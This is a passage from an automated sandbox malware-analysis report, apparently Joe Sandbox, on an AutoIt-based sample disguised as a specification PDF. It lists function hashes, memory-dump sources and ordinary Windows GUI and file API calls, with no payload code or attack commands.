                                      • Opcode ID: 17238fdfae74eda5e377931ce01843d7014da8985009bb3bba4c71b9e395c76f
                                      • Instruction ID: 7d2041339b6130ab46d2423a81a97b2798cc00367e6a4459970336bc890d7014
                                      • Opcode Fuzzy Hash: 17238fdfae74eda5e377931ce01843d7014da8985009bb3bba4c71b9e395c76f
                                      • Instruction Fuzzy Hash: B4321422E29F414DD7239635D822336A39DAFB73D4F15D737E819B5DAAEB28C4835100
                                      Function 003496C0 Relevance: .6, Instructions: 573COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.6128162862.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                      • Associated: 00000000.00000002.6128115490.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128337550.00000000003CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128337550.00000000003EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128458435.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128512606.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_340000_HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 540e05c9d39d57381d420a26876b3417d0b036a5e77a6e2ecbe4c0b08b03caef
                                      • Instruction ID: bb636cf8f8b344cc7ec53c03fe010a45280503ee05f977fad47a70eaf7e128e2
                                      • Opcode Fuzzy Hash: 540e05c9d39d57381d420a26876b3417d0b036a5e77a6e2ecbe4c0b08b03caef
                                      • Instruction Fuzzy Hash: 2A2298716183009FD726DF14C891BAFB7E8AF84314F11491EF99A9F2A1DB71E944CB82
                                      Function 0037410F Relevance: .6, Instructions: 556COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.6128162862.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                      • Associated: 00000000.00000002.6128115490.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128337550.00000000003CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128337550.00000000003EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128458435.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128512606.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_340000_HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 22b80eeed607bc25720e2431976139bc70f79f6491af109f4a3b83ef9bc813c5
                                      • Instruction ID: ff491b91436b1fe26da233be76e67c5386c855613669dd96ab73fc40ccbfb8ea
                                      • Opcode Fuzzy Hash: 22b80eeed607bc25720e2431976139bc70f79f6491af109f4a3b83ef9bc813c5
                                      • Instruction Fuzzy Hash: AA129071E006199FDF15CFA8E8905ECB7B2FB8C320F65862DE426EB694D774A911CB40
                                      Function 0037467F Relevance: .6, Instructions: 556COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.6128162862.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                      • Associated: 00000000.00000002.6128115490.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128337550.00000000003CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128337550.00000000003EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128458435.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128512606.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_340000_HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 7b4bbca89500df55cfad13d31e99f660e36799e05b27f1ad51d825235cdc89ae
                                      • Instruction ID: e86310e91c43f17b23d6899823f32f8c844c440384f93f4933a8aeb0f10210ed
                                      • Opcode Fuzzy Hash: 7b4bbca89500df55cfad13d31e99f660e36799e05b27f1ad51d825235cdc89ae
                                      • Instruction Fuzzy Hash: 8312AF71E106199FDF19CFA8D8905EDB7B2FBC8310F24862EE526EB294D774A901CB40
                                      Function 003493F0 Relevance: .5, Instructions: 531COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.6128162862.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                      • Associated: 00000000.00000002.6128115490.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128337550.00000000003CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128337550.00000000003EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128458435.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128512606.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_340000_HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 325d330d34db0fdddf54b1f9ef78bd56c84181efddde23b5ca5f0ce967295018
                                      • Instruction ID: 7edddc4e0f36288a68b9c86e4c87df65d5f0dd2b01b578b755899ec6a010cbec
                                      • Opcode Fuzzy Hash: 325d330d34db0fdddf54b1f9ef78bd56c84181efddde23b5ca5f0ce967295018
                                      • Instruction Fuzzy Hash: 5012AF70A00609DFDF06DFA5D982AEEB7F9FF48300F104669E806EB655EB35A914CB50
                                      Function 0034E3E3 Relevance: .5, Instructions: 521COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.6128162862.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                      • Associated: 00000000.00000002.6128115490.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128337550.00000000003CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128337550.00000000003EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128458435.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128512606.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_340000_HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 4621b4390cd5b468ff12d18b651731c33bb0be96cfa0d1178663c60751cb2bf6
                                      • Instruction ID: 48593709e9577025b9d62eea83fb14d3c8e1b6b014ab300aca58f044904e782b
                                      • Opcode Fuzzy Hash: 4621b4390cd5b468ff12d18b651731c33bb0be96cfa0d1178663c60751cb2bf6
                                      • Instruction Fuzzy Hash: 5312BD70904206CFDB26DF58C480AAAB7F0FF58314F168069E98AAF751E735BD85CB91
                                      Function 0034AF50 Relevance: .5, Instructions: 514COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.6128162862.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                      • Associated: 00000000.00000002.6128115490.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128337550.00000000003CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128337550.00000000003EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128458435.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128512606.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_340000_HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 04d0ac1fcc08aad1d22c7b0f03909a9a1b4ec2bf66c8097fef2fc6138227a730
                                      • Instruction ID: cc8d9543e8260733927136c815604cc07c3548d90be1219da42269c445330ec5
                                      • Opcode Fuzzy Hash: 04d0ac1fcc08aad1d22c7b0f03909a9a1b4ec2bf66c8097fef2fc6138227a730
                                      • Instruction Fuzzy Hash: 700290B0A00105DBCF16DF64D981AAFBBF9EF44300F118469E906DF265EB31EA15CB91
                                      Function 0035F563 Relevance: .5, Instructions: 481COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.6128162862.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                      • Associated: 00000000.00000002.6128115490.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128337550.00000000003CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128337550.00000000003EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128458435.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128512606.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_340000_HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: daa0bbb24984a8a543e250f46780a04699704cd7b513c438dcd45243517a8a81
                                      • Instruction ID: 525d67d32432846d23c6202ca46ca148019a0baa49555c28b5e24edfb8d6c698
                                      • Opcode Fuzzy Hash: daa0bbb24984a8a543e250f46780a04699704cd7b513c438dcd45243517a8a81
                                      • Instruction Fuzzy Hash: EF02C6322051930ECF1E4A39847193B7BA16A527B631B477DDCB6CF4E6EF20D528D650
                                      Function 003602A4 Relevance: .3, Instructions: 345COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.6128162862.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                      • Associated: 00000000.00000002.6128115490.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128337550.00000000003CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128337550.00000000003EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128458435.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128512606.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_340000_HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 6bcf19402166b509fafb4c50a64371ef2a93877f8d810bfc08732e8a9195a1a8
                                      • Instruction ID: d6eb7c5c7d737e47d6f8e9286e90ac72b5232ca2958a4fcef1f62ea417529371
                                      • Opcode Fuzzy Hash: 6bcf19402166b509fafb4c50a64371ef2a93877f8d810bfc08732e8a9195a1a8
                                      • Instruction Fuzzy Hash: 0AC186362051930EDF2F463AD47643FBAA15A927B231B476DD8B3CB5E9EF10C528D620
                                      Function 003606D9 Relevance: .3, Instructions: 341COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.6128162862.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                      • Associated: 00000000.00000002.6128115490.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128337550.00000000003CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128337550.00000000003EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128458435.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128512606.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_340000_HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 2d76c3bdd49f8e00aad6e71f29a941d673537f809e9b181fbd8d4251c6dfdf40
                                      • Instruction ID: 3e2567311adf72461193e9270d7becd74cdb4062f4428ac1e398cd964e845d6f
                                      • Opcode Fuzzy Hash: 2d76c3bdd49f8e00aad6e71f29a941d673537f809e9b181fbd8d4251c6dfdf40
                                      • Instruction Fuzzy Hash: CAC1933220519309DF6E4639C47643FBAA15EA27B231B476DD8B2CB5E9EF20D528D620
                                      Function 0035FA57 Relevance: .3, Instructions: 323COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.6128162862.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                      • Associated: 00000000.00000002.6128115490.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128337550.00000000003CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128337550.00000000003EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128458435.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128512606.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_340000_HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: b18fb967447e529c76739499a87999de3f08bdf72590393fa5476362680146d7
                                      • Instruction ID: 444172c533d47946d9c84d1d1e91971991adb3d61e511cf476c24dd5f57d3d45
                                      • Opcode Fuzzy Hash: b18fb967447e529c76739499a87999de3f08bdf72590393fa5476362680146d7
                                      • Instruction Fuzzy Hash: 65C170322050930DDF2E4639D47583EBAA15AA2BB631B077DDCB2CB5F5EF20C568D620
                                      Function 0037038E Relevance: .3, Instructions: 294COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.6128162862.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                      • Associated: 00000000.00000002.6128115490.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128337550.00000000003CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128337550.00000000003EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128458435.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128512606.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_340000_HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 766f83fbc61e1e641ac8a7d15449ea379c4f4bcfa2ff3e4fdc5b41657403f5e0
                                      • Instruction ID: 99396e674043f32e5a52ed04dfa88bcd8956d7f5e39e697d5ca90434039069c0
                                      • Opcode Fuzzy Hash: 766f83fbc61e1e641ac8a7d15449ea379c4f4bcfa2ff3e4fdc5b41657403f5e0
                                      • Instruction Fuzzy Hash: ECB1CF20D2AF414DD62396399871336B75CAFBB3D6F92D71BFC2A74D62EB2185834180
                                      Function 00374BEF Relevance: .2, Instructions: 197COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.6128162862.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                      • Associated: 00000000.00000002.6128115490.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128337550.00000000003CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128337550.00000000003EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128458435.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128512606.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_340000_HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: cb0e90529256691fe451d747a1bfd7884784a9d5e0aed58ac6818287fd2a7404
                                      • Instruction ID: ac3733dc861c41a6a1d71ddee720e963815d0feab54f979ed4f185c140e73e69
                                      • Opcode Fuzzy Hash: cb0e90529256691fe451d747a1bfd7884784a9d5e0aed58ac6818287fd2a7404
                                      • Instruction Fuzzy Hash: 5A614C71E016269BCF29CF59C490169BBF6FF88300719C1AAD959DF31AE734E941CB90
                                      Function 020E35F0 Relevance: .1, Instructions: 92COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.6130076775.00000000020E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020E0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_20e0000_HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 424b499c86482d5e2cad33d2eb2b77d7085f14ac4781241b47b3debc7e1ef18c
                                      • Instruction ID: 3e8e5e45321f5513ca8efc9e8b3c12a13aa2e2826fce88691029ea1f4f028989
                                      • Opcode Fuzzy Hash: 424b499c86482d5e2cad33d2eb2b77d7085f14ac4781241b47b3debc7e1ef18c
                                      • Instruction Fuzzy Hash: 4D41A2B1D1051CEBCF48CFADC991AAEBBF2AF88201F548299D516AB345D730AB41DB50
                                      Function 0038B6CC Relevance: .1, Instructions: 71COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.6128162862.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                      • Associated: 00000000.00000002.6128115490.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128337550.00000000003CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128337550.00000000003EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128458435.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128512606.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_340000_HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.jbxd
                                      Similarity
                                      • API ID: Time$FileSystem
                                      • String ID:
                                      • API String ID: 2086374402-0
                                      • Opcode ID: 5672027a0014268e01c5e946c776db46ded3d6f50b1796672cc6ce2aca8e0141
                                      • Instruction ID: d3e5b90961e1901f759e94eff278dbc957959addf64fe2b59bca7eb20307f237
                                      • Opcode Fuzzy Hash: 5672027a0014268e01c5e946c776db46ded3d6f50b1796672cc6ce2aca8e0141
                                      • Instruction Fuzzy Hash: 3121A2726346118BC72ACF28C481A52FBE5EB95311B248E7DE4E5CF2C0CB74B905CB54
                                      Function 020E3480 Relevance: .0, Instructions: 35COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.6130076775.00000000020E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020E0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_20e0000_HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 6091d3ab8c142cd01bdaf95ad615aaddba634de501579065cef803e1d5150a63
                                      • Instruction ID: 428d19142a1a62fdd7f46167f23c7c43c5ded89038b702d343119048bdd25a27
                                      • Opcode Fuzzy Hash: 6091d3ab8c142cd01bdaf95ad615aaddba634de501579065cef803e1d5150a63
                                      • Instruction Fuzzy Hash: 21018078A01209EFCB45DF98C5909AEFBF5FF88310B2085D9D809A7701E730AE81DB80
                                      Function 020E34E0 Relevance: .0, Instructions: 35COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.6130076775.00000000020E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020E0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_20e0000_HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 2824983519b781728331ca74e43d8f1b114060d413125894b627f2317d3cf6f3
                                      • Instruction ID: 298d12bfaa15570f71f5a210b41cad9bacdca3d91a5a501096aa6d61b18ecd7a
                                      • Opcode Fuzzy Hash: 2824983519b781728331ca74e43d8f1b114060d413125894b627f2317d3cf6f3
                                      • Instruction Fuzzy Hash: FB018079A00209EFCB48DF98C5909AEFBF5FB48310B2085DAD809A7741D730AE81DB80
                                      Function 020E1E70 Relevance: .0, Instructions: 6COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.6130076775.00000000020E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020E0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_20e0000_HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: e1f80ac41b4fc2d45690e214ca5193b9bf4f67450f61a2a701b7f1fb86cd8f4e
                                      • Instruction ID: 2052e7d0eb43af8a57a5c2d707c06396f1b84aee57587abda472ed480d51124b
                                      • Opcode Fuzzy Hash: e1f80ac41b4fc2d45690e214ca5193b9bf4f67450f61a2a701b7f1fb86cd8f4e
                                      • Instruction Fuzzy Hash: 1AB012310527488BC2118B89E008B1073ECA308E04F1000B0D40C07B01827874008D48
                                      Function 0039A2A9 Relevance: 75.7, APIs: 39, Strings: 4, Instructions: 490filecommemoryCOMMON
                                      Download Yara Rule
                                      APIs
                                      • DeleteObject.GDI32(00000000), ref: 0039A2FE
                                      • DeleteObject.GDI32(00000000), ref: 0039A310
                                      • DestroyWindow.USER32 ref: 0039A31E
                                      • GetDesktopWindow.USER32 ref: 0039A338
                                      • GetWindowRect.USER32(00000000), ref: 0039A33F
                                      • SetRect.USER32(?,00000000,00000000,000001F4,00000190), ref: 0039A480
                                      • AdjustWindowRectEx.USER32(?,88C00000,00000000,00000002), ref: 0039A490
                                      • CreateWindowExW.USER32(00000002,AutoIt v3,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 0039A4D8
                                      • GetClientRect.USER32(00000000,?), ref: 0039A4E4
                                      • CreateWindowExW.USER32(00000000,static,00000000,5000000E,00000000,00000000,?,?,00000000,00000000,00000000), ref: 0039A51E
                                      • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 0039A540
                                      • GetFileSize.KERNEL32(00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 0039A553
                                      • GlobalAlloc.KERNEL32(00000002,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 0039A55E
                                      • GlobalLock.KERNEL32(00000000), ref: 0039A567
                                      • ReadFile.KERNEL32(00000000,00000000,00000000,00000190,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 0039A576
                                      • GlobalUnlock.KERNEL32(00000000), ref: 0039A57F
                                      • CloseHandle.KERNEL32(00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 0039A586
                                      • GlobalFree.KERNEL32(00000000), ref: 0039A591
                                      • CreateStreamOnHGlobal.OLE32(00000000,00000001,88C00000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 0039A5A3
                                      • OleLoadPicture.OLEAUT32(88C00000,00000000,00000000,003CD9BC,00000000), ref: 0039A5B9
                                      • GlobalFree.KERNEL32(00000000), ref: 0039A5C9
                                      • CopyImage.USER32(000001F4,00000000,00000000,00000000,00002000), ref: 0039A5EF
                                      • SendMessageW.USER32(?,00000172,00000000,000001F4), ref: 0039A60E
                                      • SetWindowPos.USER32(?,00000000,00000000,00000000,?,?,00000020,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 0039A630
                                      • ShowWindow.USER32(00000004,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 0039A81D
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.6128162862.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                      • Associated: 00000000.00000002.6128115490.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128337550.00000000003CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128337550.00000000003EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128458435.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128512606.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_340000_HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.jbxd
                                      Similarity
                                      • API ID: Window$Global$CreateRect$File$DeleteFreeObject$AdjustAllocClientCloseCopyDesktopDestroyHandleImageLoadLockMessagePictureReadSendShowSizeStreamUnlock
                                      • String ID: $AutoIt v3$DISPLAY$static
                                      • API String ID: 2211948467-2373415609
                                      • Opcode ID: 229cbceb3dac061b3e968da9a0360a35b6f6ad26a38cb7513490040e12e48838
                                      • Instruction ID: f8cfe5cc25906495f709f0d124b1006922e5bafb012733748bc70168c1f46f32
                                      • Opcode Fuzzy Hash: 229cbceb3dac061b3e968da9a0360a35b6f6ad26a38cb7513490040e12e48838
                                      • Instruction Fuzzy Hash: 16025D75900114EFDB16DFA5DD89EAE7BB9EB48310F048668F905EB2A0C770AD41CBA0
                                      Function 003AD285 Relevance: 49.8, APIs: 33, Instructions: 260COMMON
                                      Download Yara Rule
                                      APIs
                                      • SetTextColor.GDI32(?,00000000), ref: 003AD2DB
                                      • GetSysColorBrush.USER32(0000000F), ref: 003AD30C
                                      • GetSysColor.USER32(0000000F), ref: 003AD318
                                      • SetBkColor.GDI32(?,000000FF), ref: 003AD332
                                      • SelectObject.GDI32(?,00000000), ref: 003AD341
                                      • InflateRect.USER32(?,000000FF,000000FF), ref: 003AD36C
                                      • GetSysColor.USER32(00000010), ref: 003AD374
                                      • CreateSolidBrush.GDI32(00000000), ref: 003AD37B
                                      • FrameRect.USER32(?,?,00000000), ref: 003AD38A
                                      • DeleteObject.GDI32(00000000), ref: 003AD391
                                      • InflateRect.USER32(?,000000FE,000000FE), ref: 003AD3DC
                                      • FillRect.USER32(?,?,00000000), ref: 003AD40E
                                      • GetWindowLongW.USER32(?,000000F0), ref: 003AD439
                                        • Part of subcall function 003AD575: GetSysColor.USER32(00000012), ref: 003AD5AE
                                        • Part of subcall function 003AD575: SetTextColor.GDI32(?,?), ref: 003AD5B2
                                        • Part of subcall function 003AD575: GetSysColorBrush.USER32(0000000F), ref: 003AD5C8
                                        • Part of subcall function 003AD575: GetSysColor.USER32(0000000F), ref: 003AD5D3
                                        • Part of subcall function 003AD575: GetSysColor.USER32(00000011), ref: 003AD5F0
                                        • Part of subcall function 003AD575: CreatePen.GDI32(00000000,00000001,00743C00), ref: 003AD5FE
                                        • Part of subcall function 003AD575: SelectObject.GDI32(?,00000000), ref: 003AD60F
                                        • Part of subcall function 003AD575: SetBkColor.GDI32(?,00000000), ref: 003AD618
                                        • Part of subcall function 003AD575: SelectObject.GDI32(?,?), ref: 003AD625
                                        • Part of subcall function 003AD575: InflateRect.USER32(?,000000FF,000000FF), ref: 003AD644
                                        • Part of subcall function 003AD575: RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 003AD65B
